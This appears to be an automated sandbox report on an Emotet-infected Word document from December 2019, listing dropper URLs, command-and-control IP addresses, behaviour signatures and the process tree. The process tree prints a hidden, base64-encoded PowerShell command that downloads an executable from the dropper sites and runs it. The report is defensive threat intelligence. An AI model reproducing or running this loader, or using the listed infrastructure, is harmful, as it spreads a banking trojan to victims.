Overview

overview

10

task1

 

10

task2

 

10

Analysis

  • max time kernel
    150s
  • resource
    win7v191014
  • submitted
    20/12/2019, 15:53

Sharing

Copy URL Twitter E-mail

General

  • Target

    Docs_0198cd350b8be7a6eac9439badbf6ee6.1

  • Sample

    191220-zvx3r4cedj

  • SHA256

    07519f4d0537e18fc8ff259b5caaedf93617cc90aefc91a51b8cfd75c656126d

Score
10/10
trojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://dejavugroup.com/wp-content/JTjHLbr/
exe.dropper

http://dev7.developmentviewer.com/wp-admin/SYSQOx/
exe.dropper

http://krishna-graphics.com/wp-admin/11x12xd-nobh27two-82927918/
exe.dropper

http://laboratoriosanfrancisco1988.com/9rlkyc/Ccvvezsv/
exe.dropper

http://lanyuewp.com/electrician/ig9eu0g-4q1oml1qc1-749166/

Extracted

Family

emotet

C2

98.178.241.106:80

190.171.153.139:80

179.5.118.12:8080

45.79.75.232:8080

124.150.175.133:80

164.68.115.146:8080

5.189.148.98:8080

46.105.128.215:8080

67.254.196.78:443

95.216.207.86:7080

181.46.176.38:80

98.15.140.226:80

217.12.70.226:80

115.179.91.58:80

41.190.148.90:80

162.144.46.90:8080

211.218.105.101:80

212.129.14.27:8080

120.51.83.89:443

200.41.121.69:443
rsa_pubkey.plain

Signatures

  • Drops file in System32 directory 6 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

    trojanbankeremotet
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs
  • Modifies registry class 136 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_0198cd350b8be7a6eac9439badbf6ee6.1.doc"
    1⤵
    • Drops file in System32 directory
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of FindShellTrayWindow
    PID:1188
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABFAGsAZgBzAG4AZgBjAHEAbABlAHEAbgB0AD0AJwBGAHUAegBzAHYAZgBmAHUAdwBwACcAOwAkAE0AZABzAGMAcQBqAHMAZQAgAD0AIAAnADcAMQA3ACcAOwAkAEoAYwBoAGkAcgBlAGIAeABjAGgAbgBoAG8APQAnAE0AawB6AGoAdQBzAGsAbwB0AG0AJwA7ACQASQBjAGYAaQBpAHoAYQBuAHEAegB4AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABNAGQAcwBjAHEAagBzAGUAKwAnAC4AZQB4AGUAJwA7ACQAWQBwAGoAYwB1AHYAZgBoAGoAeABpAHYAPQAnAE0AZABtAG0AawBoAHcAdABoAGwAcABpAHAAJwA7ACQASAB3AGQAdABqAGgAYwBxAD0AJgAoACcAbgBlAHcAJwArACcALQBvACcAKwAnAGIAagBlACcAKwAnAGMAdAAnACkAIABuAGUAdAAuAHcARQBCAEMATABJAEUATgBUADsAJABFAHcAdwBjAHQAbwB1AHoAPQAnAGgAdAB0AHAAOgAvAC8AZABlAGoAYQB2AHUAZwByAG8AdQBwAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ASgBUAGoASABMAGIAcgAvACoAaAB0AHQAcAA6AC8ALwBkAGUAdgA3AC4AZABlAHYAZQBsAG8AcABtAGUAbgB0AHYAaQBlAHcAZQByAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBTAFkAUwBRAE8AeAAvACoAaAB0AHQAcAA6AC8ALwBrAHIAaQBzAGgAbgBhAC0AZwByAGEAcABoAGkAYwBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwAxADEAeAAxADIAeABkAC0AbgBvAGIAaAAyADcAdAB3AG8ALQA4ADIAOQAyADcAOQAxADgALwAqAGgAdAB0AHAAOgAvAC8AbABhAGIAbwByAGEAdABvAHIAaQBvAHMAYQBuAGYAcgBhAG4AYwBpAHMAYwBvADEAOQA4ADgALgBjAG8AbQAvADkAcgBsAGsAeQBjAC8AQwBjAHYAdgBlAHoAcwB2AC8AKgBoAHQAdABwADoALwAvAGwAYQBuAHkAdQBlAHcAcAAuAGMAbwBtAC8AZQBsAGUAYwB0AHIAaQBjAGkAYQBuAC8AaQBnADkAZQB1ADAAZwAtADQAcQAxAG8AbQBsADEAcQBjADEALQA3ADQAOQAxADYANgAvACcALgAiAFMAYABQAEwASQBUACIAKAAnACoAJwApADsAJABOAG4AdgB3AG0AYwBoAHQAZQBzAG0AaQBjAD0AJwBDAGQAdQB5AGYAaABiAGgAYgBuAHYAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEYAYwBsAHgAYgB3AGMAegB6AGwAIABpAG4AIAAkAEUAdwB3AGMAdABvAHUAegApAHsAdAByAHkAewAkAEgAdwBkAHQAagBoAGMAcQAuACIARABvAGAAVwBuAEwAbwBBAGAARABgAEYAaQBsAEUAIgAoACQARgBjAGwAeABiAHcAYwB6AHoAbAAsACAAJABJAGMAZgBpAGkAegBhAG4AcQB6AHgAKQA7ACQAWABuAGwAZgBhAGkAdgBqAG0APQAnAFQAZQBrAGgAdAB5AHoAdQAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAEkAYwBmAGkAaQB6AGEAbgBxAHoAeAApAC4AIgBMAGUAbgBgAEcAVABoACIAIAAtAGcAZQAgADMAMwA1ADAANQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAHQAYQBgAFIAVAAiACgAJABJAGMAZgBpAGkAegBhAG4AcQB6AHgAKQA7ACQATQBvAHEAegByAG0AZwB1AGoAcQA9ACcAVgByAGgAZwBoAHQAZwBmAHEAZQBzAGUAYQAnADsAYgByAGUAYQBrADsAJABOAGQAbwBiAG4AcABvAGEAeABvAGIAcgA9ACcAUwBwAGwAdwBlAG8AcQBtACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEEAawBuAHMAaAB3AG0AeQB0AHMAdABxAD0AJwBKAGsAZwBxAGoAcwBmAGMAeABjAHkAJwA=
    1⤵
    • Drops file in System32 directory
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • Suspicious behavior: EnumeratesProcesses
    PID:1968
    • C:\Users\Admin\717.exe
      "C:\Users\Admin\717.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:1780
      • C:\Users\Admin\717.exe
        --e535cf5b
        3⤵
        • Drops file in System32 directory
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        • Suspicious behavior: EmotetMutantsSpam
        PID:1508
  • C:\Windows\SysWOW64\nicmaker.exe
    "C:\Windows\SysWOW64\nicmaker.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Executes dropped EXE
    • Suspicious use of SetWindowsHookEx
    PID:1940
    • C:\Windows\SysWOW64\nicmaker.exe
      --df65e46e
      2⤵
      • Drops file in System32 directory
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: EmotetMutantsSpam
      PID:1332

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1188-3-0x0000000008ED0000-0x0000000008ED4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1188-2-0x00000000061AC000-0x00000000061B0000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1188-1-0x00000000061AC000-0x00000000061B0000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1188-0-0x0000000005FB0000-0x0000000005FB4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1332-17-0x00000000003C0000-0x00000000003D7000-memory.dmp

    Filesize

    92KB

    Download

  • memory/1332-18-0x0000000000400000-0x0000000000452000-memory.dmp

    Filesize

    328KB

    Download

  • memory/1508-12-0x00000000002E0000-0x00000000002F7000-memory.dmp

    Filesize

    92KB

    Download

  • memory/1508-13-0x0000000000400000-0x0000000000452000-memory.dmp

    Filesize

    328KB

    Download

  • memory/1780-8-0x00000000003B0000-0x00000000003C7000-memory.dmp

    Filesize

    92KB

    Download

  • memory/1940-15-0x00000000004F0000-0x0000000000507000-memory.dmp

    Filesize

    92KB

    Download